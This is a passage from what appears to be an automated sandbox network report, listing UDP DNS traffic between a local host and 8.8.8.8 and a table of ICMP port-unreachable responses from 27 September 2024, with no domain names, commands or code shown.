                                                                                            Sep 27, 2024 14:03:11.268800974 CEST53594328.8.8.8192.168.2.22
                                                                                            Sep 27, 2024 14:03:11.268968105 CEST5943253192.168.2.228.8.8.8
                                                                                            Sep 27, 2024 14:03:13.280126095 CEST5943253192.168.2.228.8.8.8
                                                                                            Sep 27, 2024 14:03:13.287338972 CEST53594328.8.8.8192.168.2.22
                                                                                            Sep 27, 2024 14:03:13.293257952 CEST5943253192.168.2.228.8.8.8
                                                                                            Sep 27, 2024 14:03:13.300694942 CEST53594328.8.8.8192.168.2.22
                                                                                            Sep 27, 2024 14:03:14.346698999 CEST5591053192.168.2.228.8.8.8
                                                                                            Sep 27, 2024 14:03:14.354059935 CEST53559108.8.8.8192.168.2.22
                                                                                            Sep 27, 2024 14:03:14.354322910 CEST5591053192.168.2.228.8.8.8
                                                                                            Sep 27, 2024 14:03:14.362004042 CEST53559108.8.8.8192.168.2.22
                                                                                            Sep 27, 2024 14:03:14.362245083 CEST5591053192.168.2.228.8.8.8
                                                                                            Sep 27, 2024 14:03:15.463165045 CEST53559108.8.8.8192.168.2.22
                                                                                            Sep 27, 2024 14:03:15.465377092 CEST5591053192.168.2.228.8.8.8
                                                                                            Sep 27, 2024 14:03:15.476583004 CEST53559108.8.8.8192.168.2.22
                                                                                            Sep 27, 2024 14:03:15.477320910 CEST5591053192.168.2.228.8.8.8
                                                                                            Sep 27, 2024 14:03:16.276185036 CEST53594328.8.8.8192.168.2.22
                                                                                            Sep 27, 2024 14:03:20.487415075 CEST53559108.8.8.8192.168.2.22
                                                                                            Sep 27, 2024 14:03:20.513539076 CEST6156453192.168.2.228.8.8.8
                                                                                            Sep 27, 2024 14:03:20.724675894 CEST53615648.8.8.8192.168.2.22
                                                                                            Sep 27, 2024 14:03:20.727327108 CEST6156453192.168.2.228.8.8.8
                                                                                            Sep 27, 2024 14:03:21.735188961 CEST6156453192.168.2.228.8.8.8
                                                                                            Sep 27, 2024 14:03:21.743968964 CEST53615648.8.8.8192.168.2.22
                                                                                            Sep 27, 2024 14:03:21.744133949 CEST6156453192.168.2.228.8.8.8
                                                                                            Sep 27, 2024 14:03:21.750809908 CEST53615648.8.8.8192.168.2.22
                                                                                            Sep 27, 2024 14:03:21.750930071 CEST6156453192.168.2.228.8.8.8
                                                                                            Sep 27, 2024 14:03:21.758341074 CEST53615648.8.8.8192.168.2.22
                                                                                            Sep 27, 2024 14:03:22.780183077 CEST5138453192.168.2.228.8.8.8
                                                                                            Sep 27, 2024 14:03:22.787866116 CEST53513848.8.8.8192.168.2.22
                                                                                            Sep 27, 2024 14:03:22.788068056 CEST5138453192.168.2.228.8.8.8
                                                                                            Sep 27, 2024 14:03:22.802057981 CEST53513848.8.8.8192.168.2.22
                                                                                            Sep 27, 2024 14:03:22.802196980 CEST5138453192.168.2.228.8.8.8
                                                                                            Sep 27, 2024 14:03:22.810877085 CEST53513848.8.8.8192.168.2.22
                                                                                            Sep 27, 2024 14:03:22.811011076 CEST5138453192.168.2.228.8.8.8
                                                                                            Sep 27, 2024 14:03:23.839494944 CEST53615648.8.8.8192.168.2.22
                                                                                            Sep 27, 2024 14:03:26.805227995 CEST5138453192.168.2.228.8.8.8
                                                                                            Sep 27, 2024 14:03:26.839483023 CEST53513848.8.8.8192.168.2.22
                                                                                            Sep 27, 2024 14:03:27.817451000 CEST53513848.8.8.8192.168.2.22
                                                                                            Sep 27, 2024 14:03:27.858911991 CEST5378553192.168.2.228.8.8.8
                                                                                            Sep 27, 2024 14:03:27.866089106 CEST53537858.8.8.8192.168.2.22
                                                                                            Sep 27, 2024 14:03:27.868410110 CEST5378553192.168.2.228.8.8.8
                                                                                            Sep 27, 2024 14:03:27.875403881 CEST53537858.8.8.8192.168.2.22
                                                                                            Sep 27, 2024 14:03:27.877238035 CEST5378553192.168.2.228.8.8.8
                                                                                            Sep 27, 2024 14:03:29.878451109 CEST5378553192.168.2.228.8.8.8
                                                                                            Sep 27, 2024 14:03:29.885620117 CEST53537858.8.8.8192.168.2.22
                                                                                            Sep 27, 2024 14:03:29.885818005 CEST5378553192.168.2.228.8.8.8
                                                                                            Sep 27, 2024 14:03:29.893071890 CEST53537858.8.8.8192.168.2.22
                                                                                            Sep 27, 2024 14:03:30.901026964 CEST5527753192.168.2.228.8.8.8
                                                                                            Sep 27, 2024 14:03:30.908344030 CEST53552778.8.8.8192.168.2.22
                                                                                            Sep 27, 2024 14:03:30.908582926 CEST5527753192.168.2.228.8.8.8
                                                                                            Sep 27, 2024 14:03:30.915632963 CEST53552778.8.8.8192.168.2.22
                                                                                            Sep 27, 2024 14:03:30.915776968 CEST5527753192.168.2.228.8.8.8
                                                                                            Sep 27, 2024 14:03:30.922255039 CEST53552778.8.8.8192.168.2.22
                                                                                            Sep 27, 2024 14:03:30.922401905 CEST5527753192.168.2.228.8.8.8
                                                                                            Sep 27, 2024 14:03:30.929333925 CEST53552778.8.8.8192.168.2.22
                                                                                            Sep 27, 2024 14:03:30.929476976 CEST5527753192.168.2.228.8.8.8
                                                                                            Sep 27, 2024 14:03:30.936537981 CEST53552778.8.8.8192.168.2.22
                                                                                            Sep 27, 2024 14:03:31.943100929 CEST5118353192.168.2.228.8.8.8
                                                                                            Sep 27, 2024 14:03:31.950285912 CEST53511838.8.8.8192.168.2.22
                                                                                            Sep 27, 2024 14:03:31.950442076 CEST5118353192.168.2.228.8.8.8
                                                                                            Sep 27, 2024 14:03:31.957325935 CEST53511838.8.8.8192.168.2.22
                                                                                            Sep 27, 2024 14:03:31.957448959 CEST5118353192.168.2.228.8.8.8
                                                                                            Sep 27, 2024 14:03:31.964711905 CEST53511838.8.8.8192.168.2.22
                                                                                            Sep 27, 2024 14:03:31.964853048 CEST5118353192.168.2.228.8.8.8
                                                                                            Sep 27, 2024 14:03:31.971112013 CEST53511838.8.8.8192.168.2.22
                                                                                            Sep 27, 2024 14:03:31.971231937 CEST5118353192.168.2.228.8.8.8
                                                                                            Sep 27, 2024 14:03:31.978169918 CEST53511838.8.8.8192.168.2.22
                                                                                            Sep 27, 2024 14:03:32.884155035 CEST53537858.8.8.8192.168.2.22
                                                                                            Sep 27, 2024 14:03:32.988152027 CEST5702753192.168.2.228.8.8.8
                                                                                            Sep 27, 2024 14:03:32.996156931 CEST53570278.8.8.8192.168.2.22
                                                                                            Sep 27, 2024 14:03:32.999370098 CEST5702753192.168.2.228.8.8.8
                                                                                            Sep 27, 2024 14:03:33.007205963 CEST53570278.8.8.8192.168.2.22
                                                                                            Sep 27, 2024 14:03:33.013245106 CEST5702753192.168.2.228.8.8.8
                                                                                            Sep 27, 2024 14:03:33.027122974 CEST53570278.8.8.8192.168.2.22
                                                                                            Sep 27, 2024 14:03:33.028222084 CEST5702753192.168.2.228.8.8.8
                                                                                            Sep 27, 2024 14:03:33.060317039 CEST53570278.8.8.8192.168.2.22
                                                                                            Sep 27, 2024 14:03:33.063311100 CEST5702753192.168.2.228.8.8.8
                                                                                            Sep 27, 2024 14:03:33.082410097 CEST53570278.8.8.8192.168.2.22
                                                                                            Sep 27, 2024 14:03:34.098870039 CEST5038053192.168.2.228.8.8.8
                                                                                            Sep 27, 2024 14:03:34.105576992 CEST53503808.8.8.8192.168.2.22
                                                                                            Sep 27, 2024 14:03:34.105849981 CEST5038053192.168.2.228.8.8.8
                                                                                            Sep 27, 2024 14:03:34.112112045 CEST53503808.8.8.8192.168.2.22
                                                                                            Sep 27, 2024 14:03:34.112404108 CEST5038053192.168.2.228.8.8.8
                                                                                            Sep 27, 2024 14:03:36.118577003 CEST5038053192.168.2.228.8.8.8
                                                                                            Sep 27, 2024 14:03:36.134543896 CEST53503808.8.8.8192.168.2.22
                                                                                            Sep 27, 2024 14:03:36.135509014 CEST5038053192.168.2.228.8.8.8
                                                                                            Sep 27, 2024 14:03:36.146959066 CEST53503808.8.8.8192.168.2.22
                                                                                            Sep 27, 2024 14:03:37.162839890 CEST5615653192.168.2.228.8.8.8
                                                                                            Sep 27, 2024 14:03:37.171109915 CEST53561568.8.8.8192.168.2.22
                                                                                            Sep 27, 2024 14:03:37.171395063 CEST5615653192.168.2.228.8.8.8
                                                                                            Sep 27, 2024 14:03:37.179757118 CEST53561568.8.8.8192.168.2.22
                                                                                            Sep 27, 2024 14:03:37.183876991 CEST5615653192.168.2.228.8.8.8
                                                                                            Sep 27, 2024 14:03:37.201328039 CEST53561568.8.8.8192.168.2.22
                                                                                            Sep 27, 2024 14:03:37.203316927 CEST5615653192.168.2.228.8.8.8
                                                                                            Sep 27, 2024 14:03:37.212629080 CEST53561568.8.8.8192.168.2.22
                                                                                            Sep 27, 2024 14:03:37.215513945 CEST5615653192.168.2.228.8.8.8
                                                                                            Sep 27, 2024 14:03:39.127368927 CEST53503808.8.8.8192.168.2.22
                                                                                            Sep 27, 2024 14:03:39.353874922 CEST53561568.8.8.8192.168.2.22
                                                                                            Sep 27, 2024 14:03:40.369716883 CEST6097153192.168.2.228.8.8.8
                                                                                            Sep 27, 2024 14:03:40.483434916 CEST53609718.8.8.8192.168.2.22
                                                                                            Sep 27, 2024 14:03:40.483668089 CEST6097153192.168.2.228.8.8.8
                                                                                            Sep 27, 2024 14:03:41.484903097 CEST6097153192.168.2.228.8.8.8
                                                                                            Sep 27, 2024 14:03:41.592226028 CEST53609718.8.8.8192.168.2.22
                                                                                            Sep 27, 2024 14:03:41.595396996 CEST6097153192.168.2.228.8.8.8
                                                                                            Sep 27, 2024 14:03:41.615974903 CEST53609718.8.8.8192.168.2.22
                                                                                            Sep 27, 2024 14:03:41.616406918 CEST6097153192.168.2.228.8.8.8
                                                                                            Sep 27, 2024 14:03:41.644957066 CEST53609718.8.8.8192.168.2.22
                                                                                            Sep 27, 2024 14:03:42.663310051 CEST5630853192.168.2.228.8.8.8
                                                                                            Sep 27, 2024 14:03:42.671911001 CEST53563088.8.8.8192.168.2.22
                                                                                            Sep 27, 2024 14:03:42.672385931 CEST5630853192.168.2.228.8.8.8
                                                                                            Sep 27, 2024 14:03:42.679816961 CEST53563088.8.8.8192.168.2.22
                                                                                            Sep 27, 2024 14:03:42.681231022 CEST5630853192.168.2.228.8.8.8
                                                                                            Sep 27, 2024 14:03:42.688930988 CEST53563088.8.8.8192.168.2.22
                                                                                            Sep 27, 2024 14:03:42.689261913 CEST5630853192.168.2.228.8.8.8
                                                                                            Sep 27, 2024 14:03:42.697402000 CEST53563088.8.8.8192.168.2.22
                                                                                            Sep 27, 2024 14:03:42.701257944 CEST5630853192.168.2.228.8.8.8
                                                                                            Sep 27, 2024 14:03:42.707848072 CEST53563088.8.8.8192.168.2.22
                                                                                            Sep 27, 2024 14:03:43.722898960 CEST5126853192.168.2.228.8.8.8
                                                                                            Sep 27, 2024 14:03:43.730081081 CEST53512688.8.8.8192.168.2.22
                                                                                            Sep 27, 2024 14:03:43.730235100 CEST5126853192.168.2.228.8.8.8
                                                                                            Sep 27, 2024 14:03:43.737183094 CEST53512688.8.8.8192.168.2.22
                                                                                            Sep 27, 2024 14:03:43.737288952 CEST5126853192.168.2.228.8.8.8
                                                                                            Sep 27, 2024 14:03:43.744046926 CEST53512688.8.8.8192.168.2.22
                                                                                            Sep 27, 2024 14:03:43.744151115 CEST5126853192.168.2.228.8.8.8
                                                                                            Sep 27, 2024 14:03:43.752101898 CEST53512688.8.8.8192.168.2.22
                                                                                            Sep 27, 2024 14:03:43.752209902 CEST5126853192.168.2.228.8.8.8
                                                                                            Sep 27, 2024 14:03:43.759710073 CEST53512688.8.8.8192.168.2.22
                                                                                            Sep 27, 2024 14:03:44.765592098 CEST5947553192.168.2.228.8.8.8
                                                                                            Sep 27, 2024 14:03:44.772829056 CEST53594758.8.8.8192.168.2.22
                                                                                            Sep 27, 2024 14:03:44.773000002 CEST5947553192.168.2.228.8.8.8
                                                                                            Sep 27, 2024 14:03:44.780010939 CEST53594758.8.8.8192.168.2.22
                                                                                            Sep 27, 2024 14:03:44.780136108 CEST5947553192.168.2.228.8.8.8
                                                                                            Sep 27, 2024 14:03:45.023657084 CEST53594758.8.8.8192.168.2.22
                                                                                            Sep 27, 2024 14:03:45.023869038 CEST5947553192.168.2.228.8.8.8
                                                                                            Sep 27, 2024 14:03:45.031347990 CEST53594758.8.8.8192.168.2.22
                                                                                            Sep 27, 2024 14:03:45.031570911 CEST5947553192.168.2.228.8.8.8
                                                                                            Sep 27, 2024 14:03:45.510981083 CEST53609718.8.8.8192.168.2.22
                                                                                            Sep 27, 2024 14:03:50.037794113 CEST53594758.8.8.8192.168.2.22
                                                                                            Sep 27, 2024 14:03:50.057538033 CEST6293053192.168.2.228.8.8.8
                                                                                            Sep 27, 2024 14:03:51.063288927 CEST6293053192.168.2.228.8.8.8
                                                                                            Sep 27, 2024 14:03:52.077292919 CEST6293053192.168.2.228.8.8.8
                                                                                            Sep 27, 2024 14:03:53.160645962 CEST53629308.8.8.8192.168.2.22
                                                                                            Sep 27, 2024 14:03:53.160895109 CEST6293053192.168.2.228.8.8.8
                                                                                            Sep 27, 2024 14:03:55.311009884 CEST53629308.8.8.8192.168.2.22
                                                                                            Sep 27, 2024 14:03:55.311191082 CEST6293053192.168.2.228.8.8.8
                                                                                            Sep 27, 2024 14:03:55.340141058 CEST53629308.8.8.8192.168.2.22
                                                                                            Sep 27, 2024 14:03:56.356981993 CEST6100853192.168.2.228.8.8.8
                                                                                            Sep 27, 2024 14:03:56.364638090 CEST53610088.8.8.8192.168.2.22
                                                                                            Sep 27, 2024 14:03:56.364865065 CEST6100853192.168.2.228.8.8.8
                                                                                            Sep 27, 2024 14:03:56.373001099 CEST53610088.8.8.8192.168.2.22
                                                                                            Sep 27, 2024 14:03:56.373145103 CEST6100853192.168.2.228.8.8.8
                                                                                            Sep 27, 2024 14:03:56.380108118 CEST53610088.8.8.8192.168.2.22
                                                                                            Sep 27, 2024 14:03:56.380249977 CEST6100853192.168.2.228.8.8.8
                                                                                            Sep 27, 2024 14:03:56.386998892 CEST53610088.8.8.8192.168.2.22
                                                                                            Sep 27, 2024 14:03:56.387121916 CEST6100853192.168.2.228.8.8.8
                                                                                            Sep 27, 2024 14:03:56.394016981 CEST53610088.8.8.8192.168.2.22
                                                                                            Sep 27, 2024 14:03:57.413065910 CEST5951453192.168.2.228.8.8.8
                                                                                            Sep 27, 2024 14:03:58.167323112 CEST53629308.8.8.8192.168.2.22
                                                                                            Sep 27, 2024 14:03:58.426529884 CEST5951453192.168.2.228.8.8.8
                                                                                            Sep 27, 2024 14:03:58.518785954 CEST53595148.8.8.8192.168.2.22
                                                                                            Sep 27, 2024 14:03:58.520391941 CEST5951453192.168.2.228.8.8.8
                                                                                            Sep 27, 2024 14:03:58.528866053 CEST53595148.8.8.8192.168.2.22
                                                                                            Sep 27, 2024 14:03:58.529246092 CEST5951453192.168.2.228.8.8.8
                                                                                            Sep 27, 2024 14:03:58.536273003 CEST53595148.8.8.8192.168.2.22
                                                                                            Sep 27, 2024 14:03:58.536519051 CEST5951453192.168.2.228.8.8.8
                                                                                            Sep 27, 2024 14:03:58.542874098 CEST53595148.8.8.8192.168.2.22
                                                                                            Sep 27, 2024 14:03:59.566481113 CEST5307753192.168.2.228.8.8.8
                                                                                            Sep 27, 2024 14:03:59.575504065 CEST53530778.8.8.8192.168.2.22
                                                                                            Sep 27, 2024 14:03:59.575681925 CEST5307753192.168.2.228.8.8.8
                                                                                            Sep 27, 2024 14:03:59.582453966 CEST53530778.8.8.8192.168.2.22
                                                                                            Sep 27, 2024 14:03:59.582640886 CEST5307753192.168.2.228.8.8.8
                                                                                            Sep 27, 2024 14:03:59.589376926 CEST53530778.8.8.8192.168.2.22
                                                                                            Sep 27, 2024 14:03:59.589510918 CEST5307753192.168.2.228.8.8.8
                                                                                            Sep 27, 2024 14:04:00.318022013 CEST53629308.8.8.8192.168.2.22
                                                                                            Sep 27, 2024 14:04:03.526823997 CEST53595148.8.8.8192.168.2.22
                                                                                            Sep 27, 2024 14:04:03.590403080 CEST5307753192.168.2.228.8.8.8
                                                                                            Sep 27, 2024 14:04:04.596395969 CEST53530778.8.8.8192.168.2.22
                                                                                            Sep 27, 2024 14:04:05.612298012 CEST5318853192.168.2.228.8.8.8
                                                                                            Sep 27, 2024 14:04:05.709353924 CEST53531888.8.8.8192.168.2.22
                                                                                            Sep 27, 2024 14:04:05.712228060 CEST5318853192.168.2.228.8.8.8
                                                                                            Sep 27, 2024 14:04:05.723002911 CEST53531888.8.8.8192.168.2.22
                                                                                            Sep 27, 2024 14:04:05.725301027 CEST5318853192.168.2.228.8.8.8
                                                                                            Sep 27, 2024 14:04:05.734395981 CEST53531888.8.8.8192.168.2.22
                                                                                            Sep 27, 2024 14:04:05.737396955 CEST5318853192.168.2.228.8.8.8
                                                                                            Sep 27, 2024 14:04:05.745747089 CEST53531888.8.8.8192.168.2.22
                                                                                            Sep 27, 2024 14:04:05.749265909 CEST5318853192.168.2.228.8.8.8
                                                                                            Sep 27, 2024 14:04:05.756304026 CEST53531888.8.8.8192.168.2.22
                                                                                            Sep 27, 2024 14:04:06.765167952 CEST5433353192.168.2.228.8.8.8
                                                                                            Sep 27, 2024 14:04:06.773870945 CEST53543338.8.8.8192.168.2.22
                                                                                            Sep 27, 2024 14:04:06.777570009 CEST5433353192.168.2.228.8.8.8
                                                                                            Sep 27, 2024 14:04:06.785607100 CEST53543338.8.8.8192.168.2.22
                                                                                            Sep 27, 2024 14:04:06.788455963 CEST5433353192.168.2.228.8.8.8
                                                                                            Sep 27, 2024 14:04:06.795650005 CEST53543338.8.8.8192.168.2.22
                                                                                            Sep 27, 2024 14:04:06.797410965 CEST5433353192.168.2.228.8.8.8
                                                                                            Sep 27, 2024 14:04:06.804503918 CEST53543338.8.8.8192.168.2.22
                                                                                            Sep 27, 2024 14:04:06.805464029 CEST5433353192.168.2.228.8.8.8
                                                                                            Sep 27, 2024 14:04:06.812680960 CEST53543338.8.8.8192.168.2.22
                                                                                            Sep 27, 2024 14:04:07.832499981 CEST5538853192.168.2.228.8.8.8
                                                                                            Sep 27, 2024 14:04:07.839571953 CEST53553888.8.8.8192.168.2.22
                                                                                            Sep 27, 2024 14:04:07.841325045 CEST5538853192.168.2.228.8.8.8
                                                                                            Sep 27, 2024 14:04:07.848284006 CEST53553888.8.8.8192.168.2.22
                                                                                            Sep 27, 2024 14:04:07.849286079 CEST5538853192.168.2.228.8.8.8
                                                                                            Sep 27, 2024 14:04:07.856482983 CEST53553888.8.8.8192.168.2.22
                                                                                            Sep 27, 2024 14:04:07.857372999 CEST5538853192.168.2.228.8.8.8
                                                                                            Sep 27, 2024 14:04:07.865385056 CEST53553888.8.8.8192.168.2.22
                                                                                            Sep 27, 2024 14:04:07.869282961 CEST5538853192.168.2.228.8.8.8
                                                                                            Sep 27, 2024 14:04:07.877347946 CEST53553888.8.8.8192.168.2.22
                                                                                            Sep 27, 2024 14:04:08.596848965 CEST53530778.8.8.8192.168.2.22
                                                                                            Sep 27, 2024 14:04:08.899297953 CEST6062453192.168.2.228.8.8.8
                                                                                            Sep 27, 2024 14:04:08.906687975 CEST53606248.8.8.8192.168.2.22
                                                                                            Sep 27, 2024 14:04:08.906862974 CEST6062453192.168.2.228.8.8.8
                                                                                            Sep 27, 2024 14:04:08.913932085 CEST53606248.8.8.8192.168.2.22
                                                                                            Sep 27, 2024 14:04:08.914143085 CEST6062453192.168.2.228.8.8.8
                                                                                            Sep 27, 2024 14:04:08.920460939 CEST53606248.8.8.8192.168.2.22
                                                                                            Sep 27, 2024 14:04:08.920691967 CEST6062453192.168.2.228.8.8.8
                                                                                            Sep 27, 2024 14:04:08.927335978 CEST53606248.8.8.8192.168.2.22
                                                                                            Sep 27, 2024 14:04:08.927462101 CEST6062453192.168.2.228.8.8.8
                                                                                            Sep 27, 2024 14:04:08.934551001 CEST53606248.8.8.8192.168.2.22
                                                                                            Sep 27, 2024 14:04:10.068567038 CEST5897453192.168.2.228.8.8.8
                                                                                            Sep 27, 2024 14:04:10.075550079 CEST53589748.8.8.8192.168.2.22
                                                                                            Sep 27, 2024 14:04:10.078195095 CEST5897453192.168.2.228.8.8.8
                                                                                            Sep 27, 2024 14:04:10.085093975 CEST53589748.8.8.8192.168.2.22
                                                                                            Sep 27, 2024 14:04:10.085299969 CEST5897453192.168.2.228.8.8.8
                                                                                            Sep 27, 2024 14:04:10.092226028 CEST53589748.8.8.8192.168.2.22
                                                                                            Sep 27, 2024 14:04:10.092714071 CEST5897453192.168.2.228.8.8.8
                                                                                            Sep 27, 2024 14:04:10.100419044 CEST53589748.8.8.8192.168.2.22
                                                                                            Sep 27, 2024 14:04:10.100603104 CEST5897453192.168.2.228.8.8.8
                                                                                            Sep 27, 2024 14:04:10.108267069 CEST53589748.8.8.8192.168.2.22
                                                                                            Sep 27, 2024 14:04:11.114912987 CEST5415453192.168.2.228.8.8.8
                                                                                            Sep 27, 2024 14:04:11.121412992 CEST53541548.8.8.8192.168.2.22
                                                                                            Sep 27, 2024 14:04:11.121584892 CEST5415453192.168.2.228.8.8.8
                                                                                            Sep 27, 2024 14:04:11.128639936 CEST53541548.8.8.8192.168.2.22
                                                                                            Sep 27, 2024 14:04:11.128781080 CEST5415453192.168.2.228.8.8.8
                                                                                            Sep 27, 2024 14:04:11.136590004 CEST53541548.8.8.8192.168.2.22
                                                                                            Sep 27, 2024 14:04:11.136715889 CEST5415453192.168.2.228.8.8.8
                                                                                            Sep 27, 2024 14:04:11.144114017 CEST53541548.8.8.8192.168.2.22
                                                                                            Sep 27, 2024 14:04:11.144227028 CEST5415453192.168.2.228.8.8.8
                                                                                            Sep 27, 2024 14:04:11.150511980 CEST53541548.8.8.8192.168.2.22
                                                                                            Sep 27, 2024 14:04:12.176871061 CEST5360253192.168.2.228.8.8.8
                                                                                            Sep 27, 2024 14:04:12.184353113 CEST53536028.8.8.8192.168.2.22
                                                                                            Sep 27, 2024 14:04:12.184524059 CEST5360253192.168.2.228.8.8.8
                                                                                            Sep 27, 2024 14:04:12.191869020 CEST53536028.8.8.8192.168.2.22
                                                                                            Sep 27, 2024 14:04:12.192275047 CEST5360253192.168.2.228.8.8.8
                                                                                            Sep 27, 2024 14:04:12.200510979 CEST53536028.8.8.8192.168.2.22
                                                                                            Sep 27, 2024 14:04:12.200655937 CEST5360253192.168.2.228.8.8.8
                                                                                            Sep 27, 2024 14:04:12.209937096 CEST53536028.8.8.8192.168.2.22
                                                                                            Sep 27, 2024 14:04:12.210244894 CEST5360253192.168.2.228.8.8.8
                                                                                            Sep 27, 2024 14:04:12.218043089 CEST53536028.8.8.8192.168.2.22
                                                                                            Sep 27, 2024 14:04:14.678575993 CEST4926353192.168.2.228.8.8.8
                                                                                            Sep 27, 2024 14:04:14.687094927 CEST53492638.8.8.8192.168.2.22
                                                                                            Sep 27, 2024 14:04:14.687630892 CEST4926353192.168.2.228.8.8.8
                                                                                            Sep 27, 2024 14:04:14.696247101 CEST53492638.8.8.8192.168.2.22
                                                                                            Sep 27, 2024 14:04:14.696523905 CEST4926353192.168.2.228.8.8.8
                                                                                            Sep 27, 2024 14:04:14.703672886 CEST53492638.8.8.8192.168.2.22
                                                                                            Sep 27, 2024 14:04:14.703808069 CEST4926353192.168.2.228.8.8.8
                                                                                            Sep 27, 2024 14:04:14.710879087 CEST53492638.8.8.8192.168.2.22
                                                                                            Sep 27, 2024 14:04:14.711025000 CEST4926353192.168.2.228.8.8.8
                                                                                            Sep 27, 2024 14:04:14.718381882 CEST53492638.8.8.8192.168.2.22
                                                                                            Sep 27, 2024 14:04:16.129681110 CEST6098153192.168.2.228.8.8.8
                                                                                            Sep 27, 2024 14:04:16.136816025 CEST53609818.8.8.8192.168.2.22
                                                                                            Sep 27, 2024 14:04:16.137011051 CEST6098153192.168.2.228.8.8.8
                                                                                            Sep 27, 2024 14:04:16.144876003 CEST53609818.8.8.8192.168.2.22
                                                                                            Sep 27, 2024 14:04:16.145030022 CEST6098153192.168.2.228.8.8.8
                                                                                            Sep 27, 2024 14:04:16.151855946 CEST53609818.8.8.8192.168.2.22
                                                                                            Sep 27, 2024 14:04:16.163609028 CEST6098153192.168.2.228.8.8.8
                                                                                            Sep 27, 2024 14:04:16.169992924 CEST53609818.8.8.8192.168.2.22
                                                                                            Sep 27, 2024 14:04:18.977000952 CEST5116153192.168.2.228.8.8.8
                                                                                            Sep 27, 2024 14:04:18.989952087 CEST53511618.8.8.8192.168.2.22
                                                                                            Sep 27, 2024 14:04:18.995959044 CEST5116153192.168.2.228.8.8.8
                                                                                            Sep 27, 2024 14:04:20.001362085 CEST5116153192.168.2.228.8.8.8
                                                                                            Sep 27, 2024 14:04:22.013757944 CEST5116153192.168.2.228.8.8.8
                                                                                            Sep 27, 2024 14:04:24.007128954 CEST53511618.8.8.8192.168.2.22
                                                                                            Sep 27, 2024 14:04:25.013233900 CEST53511618.8.8.8192.168.2.22

                                                                                            ICMP Packets

                                                                                            TimestampSource IPDest IPChecksumCodeType
                                                                                            Sep 27, 2024 14:00:23.091922998 CEST192.168.2.228.8.8.8d020(Port unreachable)Destination Unreachable
                                                                                            Sep 27, 2024 14:00:26.835916996 CEST192.168.2.228.8.8.8d020(Port unreachable)Destination Unreachable
                                                                                            Sep 27, 2024 14:00:31.494343042 CEST192.168.2.228.8.8.8d010(Port unreachable)Destination Unreachable
                                                                                            Sep 27, 2024 14:00:32.505358934 CEST192.168.2.228.8.8.8d010(Port unreachable)Destination Unreachable
                                                                                            Sep 27, 2024 14:00:35.615200996 CEST192.168.2.228.8.8.8d010(Port unreachable)Destination Unreachable
                                                                                            Sep 27, 2024 14:00:36.906157017 CEST192.168.2.228.8.8.8d010(Port unreachable)Destination Unreachable
                                                                                            Sep 27, 2024 14:00:42.937768936 CEST192.168.2.228.8.8.8d010(Port unreachable)Destination Unreachable
                                                                                            Sep 27, 2024 14:00:44.954528093 CEST192.168.2.228.8.8.8d010(Port unreachable)Destination Unreachable
                                                                                            Sep 27, 2024 14:00:47.465017080 CEST192.168.2.228.8.8.8d010(Port unreachable)Destination Unreachable
                                                                                            Sep 27, 2024 14:00:57.394069910 CEST192.168.2.228.8.8.8d010(Port unreachable)Destination Unreachable
                                                                                            Sep 27, 2024 14:01:25.803627014 CEST192.168.2.228.8.8.8d010(Port unreachable)Destination Unreachable
                                                                                            Sep 27, 2024 14:01:28.930711985 CEST192.168.2.228.8.8.8d010(Port unreachable)Destination Unreachable
                                                                                            Sep 27, 2024 14:01:34.617193937 CEST192.168.2.228.8.8.8d010(Port unreachable)Destination Unreachable
                                                                                            Sep 27, 2024 14:01:36.760919094 CEST192.168.2.228.8.8.8d010(Port unreachable)Destination Unreachable
                                                                                            Sep 27, 2024 14:01:41.263108969 CEST192.168.2.228.8.8.8d020(Port unreachable)Destination Unreachable
                                                                                            Sep 27, 2024 14:01:48.332987070 CEST192.168.2.228.8.8.8d010(Port unreachable)Destination Unreachable
                                                                                            Sep 27, 2024 14:01:56.626935959 CEST192.168.2.228.8.8.8d010(Port unreachable)Destination Unreachable
                                                                                            Sep 27, 2024 14:02:04.033431053 CEST192.168.2.228.8.8.8d010(Port unreachable)Destination Unreachable
                                                                                            Sep 27, 2024 14:02:06.800112009 CEST192.168.2.228.8.8.8d010(Port unreachable)Destination Unreachable
                                                                                            Sep 27, 2024 14:02:13.154499054 CEST192.168.2.228.8.8.8d010(Port unreachable)Destination Unreachable
                                                                                            Sep 27, 2024 14:02:15.557600021 CEST192.168.2.228.8.8.8d020(Port unreachable)Destination Unreachable
                                                                                            Sep 27, 2024 14:02:31.886288881 CEST192.168.2.228.8.8.8d020(Port unreachable)Destination Unreachable
                                                                                            Sep 27, 2024 14:02:37.009579897 CEST192.168.2.228.8.8.8d010(Port unreachable)Destination Unreachable
                                                                                            Sep 27, 2024 14:03:01.781097889 CEST192.168.2.228.8.8.8d010(Port unreachable)Destination Unreachable
                                                                                            Sep 27, 2024 14:03:02.781250954 CEST192.168.2.228.8.8.8d010(Port unreachable)Destination Unreachable
                                                                                            Sep 27, 2024 14:03:11.234199047 CEST192.168.2.228.8.8.8d010(Port unreachable)Destination Unreachable
                                                                                            Sep 27, 2024 14:03:16.276978970 CEST192.168.2.228.8.8.8d010(Port unreachable)Destination Unreachable
                                                                                            Sep 27, 2024 14:03:20.487643957 CEST192.168.2.228.8.8.8d010(Port unreachable)Destination Unreachable
                                                                                            Sep 27, 2024 14:03:23.841497898 CEST192.168.2.228.8.8.8d020(Port unreachable)Destination Unreachable
                                                                                            Sep 27, 2024 14:03:27.820175886 CEST192.168.2.228.8.8.8d010(Port unreachable)Destination Unreachable
                                                                                            Sep 27, 2024 14:03:32.889189959 CEST192.168.2.228.8.8.8d010(Port unreachable)Destination Unreachable
                                                                                            Sep 27, 2024 14:03:39.127454042 CEST192.168.2.228.8.8.8d010(Port unreachable)Destination Unreachable
                                                                                            Sep 27, 2024 14:03:45.511600018 CEST192.168.2.228.8.8.8d010(Port unreachable)Destination Unreachable
                                                                                            Sep 27, 2024 14:03:50.037880898 CEST192.168.2.228.8.8.8d010(Port unreachable)Destination Unreachable
                                                                                            Sep 27, 2024 14:03:58.167408943 CEST192.168.2.228.8.8.8d010(Port unreachable)Destination Unreachable
                                                                                            Sep 27, 2024 14:04:00.318150043 CEST192.168.2.228.8.8.8d010(Port unreachable)Destination Unreachable
                                                                                            Sep 27, 2024 14:04:03.526928902 CEST192.168.2.228.8.8.8d010(Port unreachable)Destination Unreachable
                                                                                            Sep 27, 2024 14:04:08.596918106 CEST192.168.2.228.8.8.8d010(Port unreachable)Destination Unreachable
                                                                                            Sep 27, 2024 14:04:25.013314009 CEST192.168.2.228.8.8.8d010(Port unreachable)Destination Unreachable

                                                                                            DNS Queries

                                                                                            TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
